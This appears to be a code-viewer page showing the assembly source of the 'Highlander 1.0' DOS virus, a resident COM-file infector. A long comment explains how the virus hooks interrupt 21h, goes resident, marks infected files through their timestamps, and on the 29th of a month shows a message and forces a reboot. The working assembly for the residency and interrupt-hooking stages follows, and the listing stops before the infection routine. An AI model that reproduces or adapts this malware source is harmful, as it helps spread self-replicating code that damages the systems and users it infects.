📄 highland.asm
字号:
;HIGHLAND.COM
;This is the HIGHLANDER Virus version 1.0.
;This virus is a generic, parasitic, resident COM infector. It will not
;infect command.com however. It is not destructive but can be irritating.
;Interrupt 21 is hooked.
;This virus is to be assembled under TASM 2.0 with the /m2 switch.
;When an infected file is executed, the virus code is executed first.
;The virus first checks to see if the virus is already resident. It does
;this by setting the AH register to 0DEh. This subfunction is currently
;unsupported by DOS. Interrupt 21 is then called. If after the call, AH is
;unchanged, the virus is not resident. If AH no longer contains 0DEh, the
;virus is assumed to be resident (If the virus is resident, AH will actually
;be changed to 0EDh. This is never checked for, only a change from 0DEh
;is checked for). If the virus is already resident, the executing viral
;code will restore the host in memory to original condition and allow it
;to execute normally. If however, the virus is not resident, Interrupt 21
;will then be trapped by the virus. Once this is accomplished, the virus
;will free all available memory that it does not need (COM programs are
;allocated all available memory when they are executed even though they can
;only occupy one segment). The viral code will then copy the original
;environment and determine the path and filename of the host program in
;memory. The viral code will then shell out and re-execute the host
;program. The virus is nearly resident now. When the virus shells out
;and re-executes the host, a non-supported value is passed in the AL
;register. This is interpreted by the virus to mean that the infection
;is in transition and that when the host is re-executed, to assume that the
;virus is already resident. This value is then changed to the proper value
;so that the shell process will execute normally (INT 21 is already trapped
;at this point). This shell process is invisible, since the viral code
;so successfully copies the original environment. Once the host has
;finished executing, control is then returned back to the original host
;(the viral code). The virus then completes execution by going resident
;using interrupt 027h. In all appearances, the host program has just
;completed normal execution and has terminated. In actuality, the virus
;is now fully resident.
;When the virus is resident, interrupt 021h is trapped and monitored.
;When a program is executed, the resident virus gets control (DOS executes
;programs by shelling from DOS using interrupt 021h, subfunction 04bh).
;When the virus sees that a program is being executed, a series of checks
;are performed. The first thing checked for is whether or not the program
;to be executed has 'D' as the seventh letter in the filename. If it does
;the program is not infected and is allowed to execute normally (this is
;how the virus keeps from infecting COMMAND.COM. No COM file with a 'D'
;as the seventh letter will be infected). If there is no 'D' as the seventh
;letter, the virus then checks to see if the program to be executed is a
;COM file or not. If it is not a COM file, it is not infected and allowed
;to execute normally. If the COM file test is passed, the file size is then
;checked. Files are only infected if they are larger than 1024 bytes and
;smaller than 62000 bytes. If the file size is within bounds, the file
;is checked to see if it is already infected. Files are only infected
;a single time. The virus determines infection by checking the date/time
;stamp of the file. If the seconds portion of the stamp is equal to 40,
;the file is assumed to be infected. If the file is infected, the virus
;then checks the date. If it is the 29th day of any month, the virus will
;then display its irritating qualities by displaying the message
;'Highlander 1 RULES!' 21 times and then locking the machine and forcing
;a reboot. If the file is not infected, infection will proceed. The
;virus stores the original attributes and then changes the attributes to
;normal, read/write. The file length is also stored. The file is then
;opened and the first part of the file is read and stored in memory (the
;exact number of bytes is the same length as the virus). The virus then
;proceeds to overwrite the first part of the file with its own code. The
;file pointer is then adjusted to the end of the file and a short
;restoration routine is copied. The original first part of the file is
;then copied to the end of the file after the restore routine. The files
;time/date stamp is then adjusted to show an infection (the seconds portion
;of the time is set to 40. This will normally never be noticed since
;directory listings never show the seconds portion). The file is then
;closed and the original attributes are restored. Control is then passed
;to the original INT 021h routine and the now infected program is allowed
;to execute normally.
;This virus will infect read-only files.
;COMMAND.COM will not be infected.
;It is not destructive but can be highly irritating.
.model tiny
.code
IDEAL
begin:
jmp checkinfect ;jump over data to virus code
data1:
dw offset endcode+0100h ;address of restore routine
typekill:
db 01ah ;kills the DOS 'type' command
version:
db 'v05' ;virus version number
data2:
dw 0,080h,0,05ch,0,06ch,0 ;environment string for shell process
data3:
db 'COM' ;COM file check
data4:
db 0,0,1,0 ;data preceeding filename in environment
data5:
db 'Highlander 1 RULES! $' ;irritating message
restcode: ;restoration routine to restore host
rep movsb ;move host code back to original loc
push cs ;setup to transfer control to 0100h
mov ax,0100h
push ax
mov ax,cx ;zero ax
ret ;transfer control to 0100h and allow host
;to execute normally
checkinfect: ;check to see if virus already resident
mov ax,0de00h ;unsupported subfunction
int 21h
cmp ah,0deh ;is it unchanged?
je continfect ;yes, continue going resident
;no, already resident, restore host
restorehost: ;setup for restore routine
mov di,0100h ;destination of bytes to be moved
mov si,[word data1+0100h] ;address of restore routine
;(original host)
push cs ;setup for xfer to restore routine
push si
add si,checkinfect-restcode ;source of bytes to be moved
mov cx,endcode-begin ;number of bytes to move
ret ;xfer to restore routine
continfect: ;continue infection
mov ax,3521h ;set ax to get INT 21 vector address
int 21h ;get INT 21 vector
mov [WORD int21trap+1+0100h],bx
;store address in viral code
mov [WORD int21trap+3+0100h],es
;store segment in viral code
mov dx,offset start+0100h ;set dx to start of viral code
mov ax,2521h ;set ax to change INT 21 vector
int 21h ;change INT 21 to point to virus
mov [word data2+0100h+4],ds ;copy current segment to env string
mov [word data2+0100h+8],ds ;for shell process
mov [word data2+0100h+12],ds
push ds ;restore es to current segment
pop es
mov bx,offset endcode+0100h ;set bx to end of viral code
mov cl,04 ;divide by 16
shr bx,cl
inc bx ;INC by 1 just in case. bx is number of
;paragraphs of memory to reserve
mov ah,04ah ;set ah to release memory
int 21h ;release all excess memory
mov ds,[word 02ch] ;get segment of environment copy
xor si,si ;zero si
cld ;clear direction flag
tryagain:
mov di,offset data4+0100h ;point to data preceeding filename
mov cx,4 ;data is 4 bytes long
repe cmpsb ;check for match
jne tryagain ;if no match, try again
mov dx,si ;filename found. set dx to point
mov bx,offset data2+0100h ;set bx to point to environment string
mov ax,04bffh ;set ax to shell and execute. AL contains
;an invalid value which will be interpreted
;by the virus (int 21 is now trapped by it)
;and changed to 00.
cld ;clear direction flag
int 21h ;shell and re-execute the host program
mov dx,(endcode-begin)*2+0110h
;set dx to end of virus *2 plus 10. This
;will point to the end of the resident
;portion of the virus
int 27h ;terminate and stay resident
start: ;start of virus. The trapped INT 21 points
;to this location.
pushf ;store the flags
cmp ah,0deh ;is calling program checking for infection?
jne check4run ;no, continue on checking for execution
mov ah,0edh ;yes, change ah to 0edh
jmp cont ;jump over rest of viral code
check4run:
cmp ah,04bh ;check for program attempting to execute
je nextcheck ;yes, continue checks
jmp cont ;no, jump over rest of virus
nextcheck:
cmp al,0ffh ;check if virus is shelling. 0ffh will
;normally never be used and is used by
;the virus to shell the host before it is
;fully resident. This prevents the virus
;from shelling twice, which will work but
;lose the environment and cause problems.
jne workvirus ;normal DOS shell. Jump to virus meat.
xor al,al ;virus is shelling. zero al.
jmp cont ;jump over rest of virus
workvirus:
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -